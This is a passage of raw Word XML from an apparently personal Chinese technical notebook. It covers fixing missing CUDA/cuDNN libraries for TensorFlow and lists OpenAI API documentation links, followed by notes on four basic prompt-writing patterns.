          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>so.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的库到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cuda/</w:t>
      </w:r>
      <w:r>
        <w:t>lib64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下，重新运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就没问题了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D419AD5" w14:textId="18DDA829" w:rsidR="00884CB4" w:rsidRDefault="00884CB4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A88EB04" w14:textId="3E1CD547" w:rsidR="00884CB4" w:rsidRDefault="00884CB4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成美少女那个模型还是有很大的问题，缺失其他的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>so.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等等的库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732ECB13" w14:textId="658ADAC6" w:rsidR="00884CB4" w:rsidRDefault="00884CB4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后我按照网址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId276" w:history="1">
        <w:r w:rsidRPr="003D20FC">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://github.com/tensorflow/tensorflow/issues/45200</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中提到的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68727BC6" w14:textId="1AF7D78A" w:rsidR="00884CB4" w:rsidRDefault="00884CB4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00884CB4">
        <w:lastRenderedPageBreak/>
        <w:t>sudo apt install nvidia-cudnn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31149B68" w14:textId="372D5F96" w:rsidR="00884CB4" w:rsidRDefault="00884CB4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个命令会安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>左右的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cudnn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的库，是个非常庞大的库，然后就解决了全部的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>so.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E296F1" w14:textId="77777777" w:rsidR="00884CB4" w:rsidRDefault="00884CB4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E963E97" w14:textId="77777777" w:rsidR="0045278E" w:rsidRPr="0045278E" w:rsidRDefault="0045278E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045278E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; import tensorflow as tf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EBE951" w14:textId="77777777" w:rsidR="0045278E" w:rsidRPr="0045278E" w:rsidRDefault="0045278E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045278E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; tf.config.list_physical_devices('GPU')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5962A6AF" w14:textId="77777777" w:rsidR="0045278E" w:rsidRPr="0045278E" w:rsidRDefault="0045278E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045278E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2023-03-01 18:37:45.319035: I tensorflow/stream_executor/cuda/cuda_gpu_executor.cc:975] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A174BF" w14:textId="77777777" w:rsidR="0045278E" w:rsidRPr="0045278E" w:rsidRDefault="0045278E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045278E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2023-03-01 18:37:45.346398: I tensorflow/stream_executor/cuda/cuda_gpu_executor.cc:975] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25088FD1" w14:textId="77777777" w:rsidR="0045278E" w:rsidRPr="0045278E" w:rsidRDefault="0045278E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045278E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2023-03-01 18:37:45.346613: I tensorflow/stream_executor/cuda/cuda_gpu_executor.cc:975] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123BCBFF" w14:textId="548202E4" w:rsidR="007A1B20" w:rsidRDefault="0045278E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0045278E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[PhysicalDevice(name='/physical_device:GPU:0', device_type='GPU')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE22F6D" w14:textId="67C25131" w:rsidR="00285E29" w:rsidRDefault="007D2C92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7555B17F" wp14:editId="529E6293">
            <wp:extent cx="5274310" cy="54229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274310" cy="542290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31570DD8" w14:textId="73BAD3DC" w:rsidR="00285E29" w:rsidRDefault="00285E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="615E8832" w14:textId="77777777" w:rsidR="00285E29" w:rsidRDefault="00285E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116DF6FE" w14:textId="3F8EE4A8" w:rsidR="00080FAB" w:rsidRDefault="00080FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="797" w:name="_Toc159780218"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chatGPT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="797"/>
    </w:p>
    <w:p w14:paraId="55DD540C" w14:textId="3B56D5F4" w:rsidR="0094570D" w:rsidRDefault="0094570D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>hatGPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网：</w:t>
      </w:r>
      <w:hyperlink r:id="rId278" w:history="1">
        <w:r w:rsidRPr="005C4505">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://openai.com/api/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21175E17" w14:textId="4F11D52E" w:rsidR="00C477C0" w:rsidRDefault="007A0EC0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册教程：</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0EC0">
        <w:t>https://cloud.tencent.com/developer/article/2190154</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34580FC4" w14:textId="44F153D6" w:rsidR="00C477C0" w:rsidRDefault="00C477C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792A0F22" w14:textId="0D48A8CB" w:rsidR="0063626A" w:rsidRDefault="0063626A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十种模型及用法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0063626A">
        <w:t>https://platform.openai.com/docs/api-reference/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D191DE3" w14:textId="77777777" w:rsidR="0063626A" w:rsidRDefault="0063626A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284348D7" w14:textId="0323AA89" w:rsidR="00BA18BA" w:rsidRDefault="00BA18BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D2E207" w14:textId="45B5821A" w:rsidR="00C477C0" w:rsidRDefault="00BA18BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA18BA">
        <w:t>https://platform.openai.com/account/api-keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5336A2" w14:textId="6563D71E" w:rsidR="00DF1A27" w:rsidRDefault="00DF1A27" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424073E3" w14:textId="31FD58A9" w:rsidR="00DF1A27" w:rsidRDefault="00CF1EF5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chat</w:t>
      </w:r>
      <w:r>
        <w:t>GPT4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5771C90C" w14:textId="39C2FA24" w:rsidR="00DF1A27" w:rsidRDefault="00CF1EF5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CF1EF5">
        <w:t>https://platform.openai.com/docs/models/overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E585BD" w14:textId="21113729" w:rsidR="00DF1A27" w:rsidRDefault="006B17F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>hatGPT4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>训练数据</w:t>
      </w:r>
      <w:r w:rsidRPr="006B17F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>截至</w:t>
      </w:r>
      <w:r w:rsidRPr="006B17F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2021 </w:t>
      </w:r>
      <w:r w:rsidRPr="006B17F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="006B17F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r w:rsidRPr="006B17F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35826603" w14:textId="7ED4806B" w:rsidR="00DF1A27" w:rsidRDefault="00DF1A27" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394F8C25" w14:textId="7909BA61" w:rsidR="009F4171" w:rsidRDefault="009F4171" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>hatGPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>微调训练参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4171">
        <w:t>https://platform.openai.com/docs/guides/fine-tuning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEE294F" w14:textId="2BE529BB" w:rsidR="009F4171" w:rsidRDefault="00261747" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chat</w:t>
      </w:r>
      <w:r>
        <w:t>GPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00261747">
        <w:t>https://platform.openai.com/docs/api-reference/authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DA8917" w14:textId="69B7BEC1" w:rsidR="00601003" w:rsidRDefault="00601003" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中微调模型训练参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C25C4D" w14:textId="72887AC3" w:rsidR="00CC1607" w:rsidRDefault="001207DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001207DF">
        <w:t>https://platform.openai.com/docs/api-reference/fine-tunes/create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678D43B3" w14:textId="2123B94D" w:rsidR="001207DF" w:rsidRDefault="00601003" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00601003">
        <w:t>https://platform.openai.com/docs/api-reference/files/upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FB70BD" w14:textId="77777777" w:rsidR="001207DF" w:rsidRPr="001207DF" w:rsidRDefault="001207DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E082753" w14:textId="430FE615" w:rsidR="003721D9" w:rsidRDefault="003721D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>hatGPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据描述画画：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F08D68" w14:textId="05337C51" w:rsidR="00CC1607" w:rsidRDefault="003721D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003721D9">
        <w:t>https://platform.openai.com/docs/guides/images/usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2334E2C1" w14:textId="7959506D" w:rsidR="003721D9" w:rsidRDefault="00F21317" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>属于毕加索画派，画的不够精致。无法直接用于运用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B834A8B" w14:textId="619477D3" w:rsidR="003721D9" w:rsidRDefault="003721D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C5C447" w14:textId="19079D7B" w:rsidR="00EA2AB6" w:rsidRDefault="00EA2AB6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54312850" w14:textId="1A398662" w:rsidR="00EA2AB6" w:rsidRDefault="00EA2AB6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6FFD38" w14:textId="77777777" w:rsidR="00EA2AB6" w:rsidRDefault="00EA2AB6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20015189" w14:textId="77777777" w:rsidR="003721D9" w:rsidRPr="003721D9" w:rsidRDefault="003721D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA9D1E2" w14:textId="7B756E3A" w:rsidR="00DF1A27" w:rsidRDefault="00F3302E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="798" w:name="_Toc159780219"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>prompt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>训练</w:t>
      </w:r>
      <w:bookmarkEnd w:id="798"/>
    </w:p>
    <w:p w14:paraId="588DDC5E" w14:textId="1C011313" w:rsidR="00DF1A27" w:rsidRDefault="00DF1A27" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70458D73" w14:textId="7696B773" w:rsidR="00B0556D" w:rsidRDefault="00B0556D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2CA88F" w14:textId="72DCCF13" w:rsidR="00F3302E" w:rsidRDefault="00B0556D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B0556D">
        <w:t>https://www.phodal.com/blog/prompt-patterns-build-framework-for-ai/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7927F149" w14:textId="490895EE" w:rsidR="005C52E1" w:rsidRDefault="005C52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四种基础模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C81EFE" w14:textId="77777777" w:rsidR="005C52E1" w:rsidRDefault="005C52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>By example (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6088BE" w14:textId="651BA83F" w:rsidR="005C52E1" w:rsidRDefault="005C52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这种模式下，我们给模型提供一些示例文本，模型需要生成与示例文本类似的文本。这种模式通常用于生成类似于给定示例的文本，例如自动生成电子邮件、产品描述、新闻报道等。示例文本可以是单个句子或多个段落，具体取决于任务的要求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711253B2" w14:textId="77777777" w:rsidR="005C52E1" w:rsidRDefault="005C52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F825E3" w14:textId="77777777" w:rsidR="005C52E1" w:rsidRDefault="005C52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>By instruction template (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令模板</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6A97F2" w14:textId="67D2597E" w:rsidR="005C52E1" w:rsidRDefault="005C52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这种模式下，我们给模型提供一些明确的指令，模型需要根据这些指令生成文本。这种模式通常用于生成类似于技术说明书、操作手册等需要明确指令的文本。指令可以是单个句子或多个段落，具体取决于任务的要求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC0236C" w14:textId="77777777" w:rsidR="005C52E1" w:rsidRDefault="005C52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A53FE3A" w14:textId="3844083D" w:rsidR="005C52E1" w:rsidRDefault="005C52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>By specific (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特定指令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：在这种模式下，我们给模型提供一些特定信息，例如问题或关键词，模型需要生成与这些信息相关的文本。这种模式通常用于生成答案、解释或推荐等。特定信息可以是单个问题或多个关键词，具体取决于任务的要求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FCD943" w14:textId="77777777" w:rsidR="005C52E1" w:rsidRDefault="005C52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E5B1BBD" w14:textId="77777777" w:rsidR="005C52E1" w:rsidRDefault="005C52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>By proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（代理模式）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CF4183" w14:textId="18A43392" w:rsidR="00F3302E" w:rsidRDefault="005C52E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这种模式下，可以充当了一个代理，代表某个实体（例如人、角色、机器人等）进行操作或交互。代理模式的核心思想是引入一个中介对象来控制对实际对象的访问，从而实现一定程度上的隔离和保</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C8A444" w14:textId="2352A909" w:rsidR="00F3302E" w:rsidRDefault="00F3302E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352B7A10" w14:textId="5FF68FB4" w:rsidR="00F3302E" w:rsidRDefault="00F3302E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F3C8B5" w14:textId="3A2A0239" w:rsidR="00F3302E" w:rsidRDefault="00D0490F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
